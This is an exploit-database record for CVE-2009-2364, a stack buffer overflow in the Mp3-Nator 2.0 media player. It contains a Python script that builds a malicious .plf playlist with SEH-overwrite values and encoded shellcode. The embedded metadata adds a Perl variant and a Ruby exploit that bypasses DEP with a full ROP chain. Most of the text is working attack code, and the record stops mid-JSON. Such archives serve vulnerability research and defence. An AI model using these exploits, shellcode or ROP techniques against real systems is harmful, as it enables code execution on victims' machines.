ID EDB-ID:15489
Type exploitdb
Reporter C4SS!0 G0M3S
Modified 2010-11-11T00:00:00
Description
Mp3-Nator 2.0 - Buffer Overflow Exploit (SEH). CVE-2009-2364. Local exploit for the Windows platform
#!usr/bin/python
#
#Exploit Title: Exploit Buffer Overflow MP3-Nator
#Date: 10\11\2010
#Author: C4SS!0 G0M3S
#Software Link: http://www.brothersoft.com/d.php?soft_id=16524&url=http%3A%2F%2Ffiles.brothersoft.com%2Fmp3_audio%2Fplayers%2Fmp3nator.zip
#Version: 2.0
#Tested on: WIN-XP SP3
#
#
#Written By C4SS!0 G0M3S
#
#Home: http://wwww.google.com.br
#
#
#E-mail: Louredo_@hotmail.com
#
#
import os,sys
def layout():
    """Clear the console, set its colour scheme and print the tool banner.

    Both shell commands are fixed literals (no user input reaches
    ``os.system``) and both are cmd.exe builtins, so on a non-Windows
    shell they fail and only the banner lines are printed.
    """
    for command in ("cls", "color 4f"):
        os.system(command)
    banner = (
        "\n[+]Exploit : Exploit Buffer Overflow MP3-NATOR v2.0",
        "[+]Author : C4SS!0 G0M3S",
        "[+]E-mail : Louredo_@hotmail.com",
        "[+]Home : http://www.invasao.com.br",
        "[+]Impact : Hich",
        "[+]Version : 2.0\n",
    )
    for line in banner:
        print(line)
if len(sys.argv)!=2:
    # No output path on the command line: show the banner and usage text.
    # The script then simply ends; there is no explicit non-zero exit status.
    layout()
    print("[-]Usage: Exploit.py <File to Create>")
    print("[-]Exemple: Exploit.py musics.plf\n")
    print("[-]Note: The Extension of the File Should be .plf for the Exploit Work")
else:
    # Payload bytes: 21 lines of 16 escapes plus a final 7, i.e. 343 bytes.
    # The author's comment says it launches calc.exe; the same sequence
    # appears to be the one in the Perl variant on this page (EDB-ID:9060),
    # whose header labels it a 343-byte win32_exec CMD=calc payload.
    # Nothing in this script decodes or verifies the bytes.
    #Exec The Calc.exe
    buffer = ("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
    "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
    "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
    "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
    "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"
    "\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47"
    "\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38"
    "\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48"
    "\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c"
    "\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
    "\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58"
    "\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44"
    "\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38"
    "\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33"
    "\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47"
    "\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a"
    "\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b"
    "\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53"
    "\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57"
    "\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39"
    "\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46"
    "\x4e\x46\x43\x36\x42\x50\x5a")
    # Per the title (SEH overflow): a 4-byte next-SEH value followed by a
    # 4-byte handler address.  Both are hard-coded for the build named in
    # the header ("WIN-XP SP3"); what they point at cannot be checked here.
    nseh="\x90\x90\xeb\xf6"
    seh="\x1a\xab\x51\x00"
    # Filler: 3000 + 760 bytes of 0x90 before/after the payload, and 600
    # bytes of 0xcc (int3) after the SEH record.
    # NOTE(review): a playlist that is almost entirely non-printable filler
    # is the obvious signature for a content check on .plf input (text
    # only, bounded line length) before any parser touches it.
    nops="\x90" * 3000
    nops2="\x90" * 760
    shell="\xcc" * 600
    jmp="\xe8\x5b\xfb\xff\xff" #Jmp From Start The My Shellcode
    # Output path is taken verbatim from argv; it is neither restricted nor
    # checked, and the .plf extension is only advised in the usage text.
    file=str(sys.argv[1])
    # "w" is text mode: whether each "\xNN" escape reaches the file as a
    # single byte depends on the Python version and locale in use.
    op="w"
    try:
        f=open(file,op)
        # Fixed layout: nops | buffer | nops2 | jmp | nseh | seh | shell.
        f.write(nops+buffer+nops2+jmp+nseh+seh+shell)
        # close() is not in a finally block: if write() raises, the handle
        # is never closed explicitly (the IOError branch below still runs).
        f.close()
        layout()
        print("[+]Creating File: "+file)
        print("[+]Identifying Shellcode length")
        # len(buffer) is 343 (see the comment on buffer above).
        print("[+]The Length of Your Shellcode:"+str(len(buffer)))
        print("[+]File "+file+" Created Successfully")
    except IOError:
        # Covers open() and write() failures; the message is printed and
        # the script still ends with exit status 0.
        print("[+]Error in Create The File")
{"id": "EDB-ID:15489", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Mp3-Nator 2.0 - Buffer Overflow Exploit SEH", "description": "Mp3-Nator 2.0 - Buffer Overflow Exploit (SEH). CVE-2009-2364. Local exploit for windows platform", "published": "2010-11-11T00:00:00", "modified": "2010-11-11T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/15489/", "reporter": "C4SS!0 G0M3S", "references": [], "cvelist": ["CVE-2009-2364"], "lastseen": "2016-02-01T21:56:29", "viewCount": 5, "enchantments": {"score": {"value": 7.6, "vector": "NONE", "modified": "2016-02-01T21:56:29", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-2364"]}, {"type": "exploitdb", "idList": ["EDB-ID:9060", "EDB-ID:15569"]}], "modified": "2016-02-01T21:56:29", "rev": 2}, "vulnersScore": 7.6}, "sourceHref": "https://www.exploit-db.com/download/15489/", "sourceData": "#!usr/bin/python\r\n#\r\n#Exploit Title: Exploit Buffer Overflow MP3-Nator\r\n#Date: 10\\11\\2010\r\n#Author: C4SS!0 G0M3S\r\n#Software Link: http://www.brothersoft.com/d.php?soft_id=16524&url=http%3A%2F%2Ffiles.brothersoft.com%2Fmp3_audio%2Fplayers%2Fmp3nator.zip\r\n#Version: 2.0\r\n#Tested on: WIN-XP SP3\r\n#\r\n#\r\n#Writted By C4SS!0 G0M3S\r\n#\r\n#Home: http://wwww.google.com.br\r\n#\r\n#\r\n#E-mail: Louredo_@hotmail.com\r\n#\r\n#\r\nimport os,sys\r\n\r\ndef layout():\r\n os.system(\"cls\")\r\n os.system(\"color 4f\")\r\n print(\"\\n[+]Exploit : Exploit Buffer Overflow MP3-NATOR v2.0\")\r\n print(\"[+]Author : C4SS!0 G0M3S\")\r\n print(\"[+]E-mail : Louredo_@hotmail.com\")\r\n print(\"[+]Home : http://www.invasao.com.br\")\r\n print(\"[+]Impact : Hich\")\r\n print(\"[+]Version : 2.0\\n\")\r\n\r\nif len(sys.argv)!=2:\r\n\r\n layout()\r\n print(\"[-]Usage: Exploit.py <File to Create>\")\r\n print(\"[-]Exemple: Exploit.py musics.plf\\n\")\r\n print(\"[-]Note: The Extension of the File Should 
be .plf for the Exploit Work\")\r\n \r\nelse:\r\n #Exec The Calc.exe\r\n buffer = (\"\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x4f\\x49\\x49\\x49\\x49\\x49\"\r\n \"\\x49\\x51\\x5a\\x56\\x54\\x58\\x36\\x33\\x30\\x56\\x58\\x34\\x41\\x30\\x42\\x36\"\r\n \"\\x48\\x48\\x30\\x42\\x33\\x30\\x42\\x43\\x56\\x58\\x32\\x42\\x44\\x42\\x48\\x34\"\r\n \"\\x41\\x32\\x41\\x44\\x30\\x41\\x44\\x54\\x42\\x44\\x51\\x42\\x30\\x41\\x44\\x41\"\r\n \"\\x56\\x58\\x34\\x5a\\x38\\x42\\x44\\x4a\\x4f\\x4d\\x4e\\x4f\\x4a\\x4e\\x46\\x44\"\r\n \"\\x42\\x30\\x42\\x50\\x42\\x30\\x4b\\x48\\x45\\x54\\x4e\\x43\\x4b\\x38\\x4e\\x47\" \r\n \"\\x45\\x50\\x4a\\x57\\x41\\x30\\x4f\\x4e\\x4b\\x58\\x4f\\x54\\x4a\\x41\\x4b\\x38\"\r\n \"\\x4f\\x45\\x42\\x42\\x41\\x50\\x4b\\x4e\\x49\\x44\\x4b\\x38\\x46\\x33\\x4b\\x48\"\r\n \"\\x41\\x50\\x50\\x4e\\x41\\x53\\x42\\x4c\\x49\\x59\\x4e\\x4a\\x46\\x58\\x42\\x4c\"\r\n \"\\x46\\x57\\x47\\x30\\x41\\x4c\\x4c\\x4c\\x4d\\x30\\x41\\x30\\x44\\x4c\\x4b\\x4e\"\r\n \"\\x46\\x4f\\x4b\\x53\\x46\\x55\\x46\\x32\\x46\\x50\\x45\\x47\\x45\\x4e\\x4b\\x58\"\r\n \"\\x4f\\x45\\x46\\x52\\x41\\x50\\x4b\\x4e\\x48\\x56\\x4b\\x58\\x4e\\x50\\x4b\\x44\"\r\n \"\\x4b\\x48\\x4f\\x55\\x4e\\x41\\x41\\x30\\x4b\\x4e\\x4b\\x58\\x4e\\x41\\x4b\\x38\"\r\n \"\\x41\\x50\\x4b\\x4e\\x49\\x48\\x4e\\x45\\x46\\x32\\x46\\x50\\x43\\x4c\\x41\\x33\"\r\n \"\\x42\\x4c\\x46\\x46\\x4b\\x38\\x42\\x44\\x42\\x53\\x45\\x38\\x42\\x4c\\x4a\\x47\"\r\n \"\\x4e\\x30\\x4b\\x48\\x42\\x44\\x4e\\x50\\x4b\\x58\\x42\\x37\\x4e\\x51\\x4d\\x4a\"\r\n \"\\x4b\\x48\\x4a\\x36\\x4a\\x30\\x4b\\x4e\\x49\\x50\\x4b\\x38\\x42\\x58\\x42\\x4b\"\r\n \"\\x42\\x50\\x42\\x50\\x42\\x50\\x4b\\x38\\x4a\\x36\\x4e\\x43\\x4f\\x45\\x41\\x53\"\r\n \"\\x48\\x4f\\x42\\x46\\x48\\x35\\x49\\x38\\x4a\\x4f\\x43\\x48\\x42\\x4c\\x4b\\x57\"\r\n \"\\x42\\x45\\x4a\\x36\\x42\\x4f\\x4c\\x38\\x46\\x30\\x4f\\x35\\x4a\\x46\\x4a\\x39\"\r\n \"\\x50\\x4f\\x4c\\x38\\x50\\x50\\x47\\x55\\x4f\\x4f\\x47\\x4e\\x43\\x46\\x41\\x46\"\r\n 
\"\\x4e\\x46\\x43\\x36\\x42\\x50\\x5a\")\r\n\r\n nseh=\"\\x90\\x90\\xeb\\xf6\"\r\n seh=\"\\x1a\\xab\\x51\\x00\"\r\n nops=\"\\x90\" * 3000\r\n nops2=\"\\x90\" * 760\r\n shell=\"\\xcc\" * 600\r\n jmp=\"\\xe8\\x5b\\xfb\\xff\\xff\" #Jmp From Start The My Shellcode \r\n file=str(sys.argv[1])\r\n \r\n op=\"w\"\r\n try:\r\n f=open(file,op)\r\n f.write(nops+buffer+nops2+jmp+nseh+seh+shell)\r\n f.close()\r\n layout()\r\n print(\"[+]Creating File: \"+file)\r\n print(\"[+]Identifying Shellcode length\")\r\n print(\"[+]The Length of Your Shellcode:\"+str(len(buffer)))\r\n print(\"[+]File \"+file+\" Created Successfully\")\r\n except IOError:\r\n print(\"[+]Error in Create The File\")\r\n", "osvdbidlist": ["55740"]}
{"cve": [{"lastseen": "2020-10-03T11:54:15", "description": "Stack-based buffer overflow in Mp3-Nator 2.0 allows remote attackers to execute arbitrary code via (1) a long string in a .plf file and (2) a long string in the listdata.dat file, possibly related to a track entry.", "edition": 3, "cvss3": {}, "published": "2009-07-08T15:30:00", "title": "CVE-2009-2364", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-2364"], "modified": "2017-09-19T01:29:00", "cpe": ["cpe:/a:mp3-nator:mp3-nator:2.0"], "id": "CVE-2009-2364", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-2364", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:mp3-nator:mp3-nator:2.0:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2016-02-01T09:47:03", "description": "MP3-Nator 2.0 (plf File) Universal Buffer Overflow Exploit (SEH). CVE-2009-2364. 
Local exploit for windows platform", "published": "2009-07-01T00:00:00", "type": "exploitdb", "title": "MP3-Nator 2.0 plf File Universal Buffer Overflow Exploit SEH", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-2364"], "modified": "2009-07-01T00:00:00", "id": "EDB-ID:9060", "href": "https://www.exploit-db.com/exploits/9060/", "sourceData": "#!/usr/bin/perl\r\n#[+] Bug : Mp3-Nator 2.0 (plf) Universal Buffer Overflow Exploit (SEH)\r\n#[+] Author : ThE g0bL!N\r\n# # Greetz to all my friends\r\n## Download:http://files.brothersoft.com/mp3_audio/players/mp3nator.zip\r\n## Tested on: Windows XP Pro SP2 (Fr)\r\n##########################################################\r\n# win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com\r\nmy $shellcode =\r\n\"\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x4f\\x49\\x49\\x49\\x49\\x49\".\r\n\"\\x49\\x51\\x5a\\x56\\x54\\x58\\x36\\x33\\x30\\x56\\x58\\x34\\x41\\x30\\x42\\x36\".\r\n\"\\x48\\x48\\x30\\x42\\x33\\x30\\x42\\x43\\x56\\x58\\x32\\x42\\x44\\x42\\x48\\x34\".\r\n\"\\x41\\x32\\x41\\x44\\x30\\x41\\x44\\x54\\x42\\x44\\x51\\x42\\x30\\x41\\x44\\x41\".\r\n\"\\x56\\x58\\x34\\x5a\\x38\\x42\\x44\\x4a\\x4f\\x4d\\x4e\\x4f\\x4a\\x4e\\x46\\x44\".\r\n\"\\x42\\x30\\x42\\x50\\x42\\x30\\x4b\\x48\\x45\\x54\\x4e\\x43\\x4b\\x38\\x4e\\x47\".\r\n\"\\x45\\x50\\x4a\\x57\\x41\\x30\\x4f\\x4e\\x4b\\x58\\x4f\\x54\\x4a\\x41\\x4b\\x38\".\r\n\"\\x4f\\x45\\x42\\x42\\x41\\x50\\x4b\\x4e\\x49\\x44\\x4b\\x38\\x46\\x33\\x4b\\x48\".\r\n\"\\x41\\x50\\x50\\x4e\\x41\\x53\\x42\\x4c\\x49\\x59\\x4e\\x4a\\x46\\x58\\x42\\x4c\".\r\n\"\\x46\\x57\\x47\\x30\\x41\\x4c\\x4c\\x4c\\x4d\\x30\\x41\\x30\\x44\\x4c\\x4b\\x4e\".\r\n\"\\x46\\x4f\\x4b\\x53\\x46\\x55\\x46\\x32\\x46\\x50\\x45\\x47\\x45\\x4e\\x4b\\x58\".\r\n\"\\x4f\\x45\\x46\\x52\\x41\\x50\\x4b\\x4e\\x48\\x56\\x4b\\x58\\x4e\\x50\\x4b\\x44\".\r\n\"\\x4b\\x48\\x4f\\x55\\x4e\\x41\\x41\\x30\\x4b\\x4e\\x4b\\x58\\x4e\\x41\\x4b\\x38\".\r\n\"\\x41\\x50\\x4b\\x4e\\x49\\x48\\x4e\\x45\\x46\\x32
\\x46\\x50\\x43\\x4c\\x41\\x33\".\r\n\"\\x42\\x4c\\x46\\x46\\x4b\\x38\\x42\\x44\\x42\\x53\\x45\\x38\\x42\\x4c\\x4a\\x47\".\r\n\"\\x4e\\x30\\x4b\\x48\\x42\\x44\\x4e\\x50\\x4b\\x58\\x42\\x37\\x4e\\x51\\x4d\\x4a\".\r\n\"\\x4b\\x48\\x4a\\x36\\x4a\\x30\\x4b\\x4e\\x49\\x50\\x4b\\x38\\x42\\x58\\x42\\x4b\".\r\n\"\\x42\\x50\\x42\\x50\\x42\\x50\\x4b\\x38\\x4a\\x36\\x4e\\x43\\x4f\\x45\\x41\\x53\".\r\n\"\\x48\\x4f\\x42\\x46\\x48\\x35\\x49\\x38\\x4a\\x4f\\x43\\x48\\x42\\x4c\\x4b\\x57\".\r\n\"\\x42\\x45\\x4a\\x36\\x42\\x4f\\x4c\\x38\\x46\\x30\\x4f\\x35\\x4a\\x46\\x4a\\x39\".\r\n\"\\x50\\x4f\\x4c\\x38\\x50\\x50\\x47\\x55\\x4f\\x4f\\x47\\x4e\\x43\\x46\\x41\\x46\".\r\n\"\\x4e\\x46\\x43\\x36\\x42\\x50\\x5a\";\r\nmy $pad1=\"D_Z\"; #trick track\r\nmy $junk=\"\\x41\" x (4100-length($shellcode));\r\nmy $jmp=\"\\xE9\\xF7\\xEF\\xFF\\xFF\";\r\nmy $next_seh=\"\\xEB\\xF9\\x41\\x42\";\r\nmy $seh=\"\\x9C\\x29\\x40\\x00\";\r\nopen(myfile,'>>exploit.plf');\r\nprint myfile $pad1.$shellcode.$junk.$jmp.$next_seh.$seh;\r\n\r\n# milw0rm.com [2009-07-01]\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/9060/"}, {"lastseen": "2016-02-01T22:05:20", "description": "MP3-Nator Buffer Overflow (SEH - DEP BYPASS). CVE-2009-2364. 
Local exploit for windows platform", "published": "2010-11-18T00:00:00", "type": "exploitdb", "title": "MP3-Nator Buffer Overflow SEH - DEP BYPASS", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-2364"], "modified": "2010-11-18T00:00:00", "id": "EDB-ID:15569", "href": "https://www.exploit-db.com/exploits/15569/", "sourceData": "# Exploit Title: Exploit Buffer Overflow MP3-Nator (SEH - DEP BYPASS)\r\n# Date: 18-11-2010\r\n# Author: Muhamad Fadzil Ramli - mind1355[at]gmail[dot]com\r\n# Credit/Bug Found By: C4SS!0 G0M3S\r\n# Software Link: http://www.brothersoft.com/d.php?soft_id=16524&url=http://files.brothersoft.com/mp3_audio/players/mp3nator.zip\r\n# Version: 2.0\r\n# Tested on: Windows XP SP3 EN - Latest Update (VMWARE FUSION - Version 3.1.1)\r\n# CVE: N/A\r\n \r\n#! /usr/bin/env ruby\r\nfilename = 'crash.plf'\r\n\r\n# ./msfpayload windows/exec CMD=calc EXITFUNC=seh R | ./msfencode -e x86/alpha_mixed -b '\\x00' -t ruby\r\n# [*] x86/alpha_mixed succeeded with size 456 (iteration=1)\r\nshellcode =\r\n\"\\x89\\xe3\\xda\\xcf\\xd9\\x73\\xf4\\x58\\x50\\x59\\x49\\x49\\x49\\x49\" +\r\n\"\\x49\\x49\\x49\\x49\\x49\\x49\\x43\\x43\\x43\\x43\\x43\\x43\\x37\\x51\" +\r\n\"\\x5a\\x6a\\x41\\x58\\x50\\x30\\x41\\x30\\x41\\x6b\\x41\\x41\\x51\\x32\" +\r\n\"\\x41\\x42\\x32\\x42\\x42\\x30\\x42\\x42\\x41\\x42\\x58\\x50\\x38\\x41\" +\r\n\"\\x42\\x75\\x4a\\x49\\x49\\x6c\\x4d\\x38\\x4d\\x59\\x47\\x70\\x43\\x30\" +\r\n\"\\x47\\x70\\x43\\x50\\x4e\\x69\\x48\\x65\\x50\\x31\\x48\\x52\\x43\\x54\" +\r\n\"\\x4c\\x4b\\x51\\x42\\x46\\x50\\x4e\\x6b\\x50\\x52\\x44\\x4c\\x4c\\x4b\" +\r\n\"\\x50\\x52\\x46\\x74\\x4e\\x6b\\x51\\x62\\x45\\x78\\x46\\x6f\\x4c\\x77\" +\r\n\"\\x43\\x7a\\x47\\x56\\x50\\x31\\x49\\x6f\\x45\\x61\\x49\\x50\\x4e\\x4c\" +\r\n\"\\x47\\x4c\\x45\\x31\\x43\\x4c\\x47\\x72\\x44\\x6c\\x51\\x30\\x4f\\x31\" +\r\n\"\\x48\\x4f\\x46\\x6d\\x43\\x31\\x49\\x57\\x4b\\x52\\x4a\\x50\\x46\\x32\" +\r\n\"\\x43\\x67\\x4c\\x4b\\x46\\x32\\x46\\x70\\x4e\\x6b\\x43\\x72\\x47\\x4c\" 
+\r\n\"\\x47\\x71\\x48\\x50\\x4c\\x4b\\x47\\x30\\x43\\x48\\x4b\\x35\\x4b\\x70\" +\r\n\"\\x50\\x74\\x43\\x7a\\x47\\x71\\x4e\\x30\\x42\\x70\\x4c\\x4b\\x51\\x58\" +\r\n\"\\x42\\x38\\x4c\\x4b\\x42\\x78\\x51\\x30\\x46\\x61\\x48\\x53\\x49\\x73\" +\r\n\"\\x47\\x4c\\x43\\x79\\x4e\\x6b\\x44\\x74\\x4e\\x6b\\x45\\x51\\x49\\x46\" +\r\n\"\\x46\\x51\\x49\\x6f\\x45\\x61\\x4b\\x70\\x4c\\x6c\\x4f\\x31\\x48\\x4f\" +\r\n\"\\x46\\x6d\\x43\\x31\\x4a\\x67\\x47\\x48\\x4d\\x30\\x50\\x75\\x48\\x74\" +\r\n\"\\x47\\x73\\x43\\x4d\\x4a\\x58\\x45\\x6b\\x43\\x4d\\x47\\x54\\x42\\x55\" +\r\n\"\\x4b\\x52\\x50\\x58\\x4c\\x4b\\x50\\x58\\x45\\x74\\x47\\x71\\x4e\\x33\" +\r\n\"\\x51\\x76\\x4e\\x6b\\x44\\x4c\\x42\\x6b\\x4e\\x6b\\x46\\x38\\x45\\x4c\" +\r\n\"\\x45\\x51\\x4e\\x33\\x4e\\x6b\\x44\\x44\\x4c\\x4b\\x46\\x61\\x4a\\x70\" +\r\n\"\\x4f\\x79\\x50\\x44\\x44\\x64\\x44\\x64\\x51\\x4b\\x43\\x6b\\x51\\x71\" +\r\n\"\\x43\\x69\\x50\\x5a\\x42\\x71\\x4b\\x4f\\x4d\\x30\\x46\\x38\\x43\\x6f\" +\r\n\"\\x50\\x5a\\x4c\\x4b\\x47\\x62\\x48\\x6b\\x4f\\x76\\x43\\x6d\\x43\\x5a\" +\r\n\"\\x43\\x31\\x4c\\x4d\\x4e\\x65\\x48\\x39\\x45\\x50\\x47\\x70\\x47\\x70\" +\r\n\"\\x46\\x30\\x42\\x48\\x46\\x51\\x4e\\x6b\\x42\\x4f\\x4e\\x67\\x49\\x6f\" +\r\n\"\\x4e\\x35\\x4d\\x6b\\x4b\\x4e\\x46\\x6e\\x44\\x72\\x4a\\x4a\\x50\\x68\" +\r\n\"\\x4c\\x66\\x4a\\x35\\x4f\\x4d\\x4f\\x6d\\x4b\\x4f\\x48\\x55\\x47\\x4c\" +\r\n\"\\x47\\x76\\x43\\x4c\\x46\\x6a\\x4d\\x50\\x4b\\x4b\\x4d\\x30\\x44\\x35\" +\r\n\"\\x45\\x55\\x4f\\x4b\\x47\\x37\\x47\\x63\\x43\\x42\\x50\\x6f\\x51\\x7a\" +\r\n\"\\x45\\x50\\x42\\x73\\x4b\\x4f\\x49\\x45\\x45\\x33\\x43\\x51\\x50\\x6c\" +\r\n\"\\x51\\x73\\x45\\x50\\x47\\x7a\\x41\\x41\"\r\n\r\njunk1 \t= 'A' * 28\r\n\r\n# ROP1\r\nrop1\t= ''\r\nrop1\t<< [0x71ABDAC3].pack('V')\t# PUSH ESP # POP ESI # RETN \t[Module : WS2_32.dll]\r\nrop1\t<< [0x71ABDC56].pack('V') # MOV EAX,ESI # POP ESI # RETN \t[Module : WS2_32.dll]\r\nrop1\t<< \"DEAD\"\t\t\t\t\t# PADDING\r\nrop1\t<< [0x1001595E].pack('V')\t# ADD ESP,20 # RETN - xaudio.dll\r\n\r\n# 
VIRTUALPROTECT PARAMETERS\r\nparams\t= ''\r\nparams\t<< [0x7C801AD4].pack('V')\t# VirtualProtect\r\nparams\t<< 'WWWW'\t\t\t\t\t# return address [ PARAM #1 ]\r\nparams\t<< 'XXXX'\t\t\t\t\t# lpAddress [ PARAM #2 ]\r\nparams\t<< 'YYYY'\t\t\t\t\t# Size [ PARAM #3 ]\r\nparams\t<< 'ZZZZ'\t\t\t\t\t# flNewProtect [ PARAM #4 ]\r\nparams\t<< [0x5ADA1005].pack('V')\t# writeable address\r\nparams\t<< 'BEEF' * 2\t\t\t\t# PADDING\r\n\r\n# ROP2 - [ PARAM #1 ]\r\nrop2\t= ''\r\nrop2\t<< [0x775D1578].pack('V')\t# PUSH EAX # POP ESI # RETN \t[Module : ole32.dll]\r\nrop2\t<< [0x77C4EC2B].pack('V')\t# ADD EAX,100 # POP EBP # RETN \t[Module : msvcrt.dll]\r\nrop2\t<< \"BEEF\"\t\t\t\t\t# PADDING\r\nrop2\t<< [0x77C4EC2B].pack('V')\t# ADD EAX,100 # POP EBP # RETN \t[Module : msvcrt.dll]\r\nrop2\t<< 'BEEF'\t\t\t\t\t# PADDING\r\nrop2\t<< [0x77E8416B].pack('V')\t# MOV DWORD PTR DS:[ESI+10],EAX # MOV EAX,ESI # POP ESI # RETN \t[Module : RPCRT4.dll]\r\nrop2\t<< 'BEEF'\r\n\r\n# ROP2 - [ PARAM #2 ]\r\nrop2\t<< [0x775D1578].pack('V')\t# PUSH EAX # POP ESI # RETN \t[Module : ole32.dll]\r\nrop2\t<< [0x77C4EC2B].pack('V')\t# ADD EAX,100 # POP EBP # RETN \t[Module : msvcrt.dll]\r\nrop2\t<< 'BEEF'\t\t\t\t\t# PADDING\r\nrop2\t<< [0x77157D1D].pack('V') * 4 # INC ESI # RETN \t[Module : oleaut32.dll]\r\nrop2\t<< [0x77E8416B].pack('V')\t# MOV DWORD PTR DS:[ESI+10],EAX # MOV EAX,ESI # POP ESI # RETN \t[Module : RPCRT4.dll]\r\nrop2\t<< 'BEEF'\r\n\r\n# rop2 - [ PARAM #3 ]\r\nrop2\t<< [0x775D1578].pack('V')\t# PUSH EAX # POP ESI # RETN \t[Module : ole32.dll]\r\nrop2\t<< [0x77E8559E].pack('V')\t# XOR EAX,EAX # RETN \t[Module : RPCRT4.dll]\r\nrop2\t<< [0x77C4EC2B].pack('V')\t# ADD EAX,100 # POP EBP # RETN \t[Module : msvcrt.dll]\r\nrop2\t<< 'BEEF'\t\t\t\t\t# PADDING\r\nrop2\t<< [0x77C4EC2B].pack('V')\t# ADD EAX,100 # POP EBP # RETN \t[Module : msvcrt.dll]\r\nrop2\t<< 'BEEF'\t\t\t\t\t# PADDING\r\nrop2\t<< [0x77C4EC2B].pack('V')\t# ADD EAX,100 # POP EBP # RETN \t[Module : msvcrt.dll]\r\nrop2\t<< 'BEEF'\t\t\t\t\t# 
PADDING\r\nrop2\t<< [0x77157D1D].pack('V') * 4 # INC ESI # RETN \t[Module : oleaut32.dll]\r\nrop2\t<< [0x77E8416B].pack('V')\t# MOV DWORD PTR DS:[ESI+10],EAX # MOV EAX,ESI # POP ESI # RETN \t[Module : RPCRT4.dll]\r\nrop2\t<< 'BEEF'\r\n\r\n# rop2\t- [ PARAM #4 ]\r\nrop2\t<< [0x775D1578].pack('V')\t# PUSH EAX # POP ESI # RETN \t[Module : ole32.dll]\r\nrop2\t<< [0x77E8559E].pack('V')\t# XOR EAX,EAX # RETN \t[Module : RPCRT4.dll]\r\nrop2\t<< [0x77C4EC1D].pack('V')\t# ADD EAX,40 # POP EBP # RETN \t[Module : msvcrt.dll]\r\nrop2\t<< 'BEEF'\t\t\t\t\t# PADDING\r\nrop2\t<< [0x77157D1D].pack('V') * 4 # INC ESI # RETN \t[Module : oleaut32.dll]\r\nrop2\t<< [0x77E8416B].pack('V')\t# MOV DWORD PTR DS:[ESI+10],EAX # MOV EAX,ESI # POP ESI # RETN \t[Module : RPCRT4.dll]\r\nrop2\t<< 'BEEF'\r\n\r\n# POINT ESP TO VIRTUALPROTECT\r\nrop2\t<< [0x7475B960].pack('V')\t# XCHG EAX,ESP # RETN \t[Module : MSCTF.dll]\r\nnops\t= \"\\x90\" * 310\r\n\r\njunk1\t= junk1 + rop1 + params + rop2 + nops + shellcode + 'A' * (4112 - (junk1 + rop1 + params + rop2 + nops + shellcode).length)\r\n\r\nseh\t\t= [0x10019C35].pack('V')\t# ADD ESP,41C # RETN - xaudio.dll\r\njunk2\t= 'C' * (10000 - (junk1 + seh).length)\r\nxploit\t= junk1 + seh + junk2\r\n\r\nFile.open(filename,'w') do |fd|\r\n\tfd.write xploit\r\n\tputs \"file size : #{xploit.length.to_s}\"\r\nend", "cvss": {"score": 9.3, "vector": 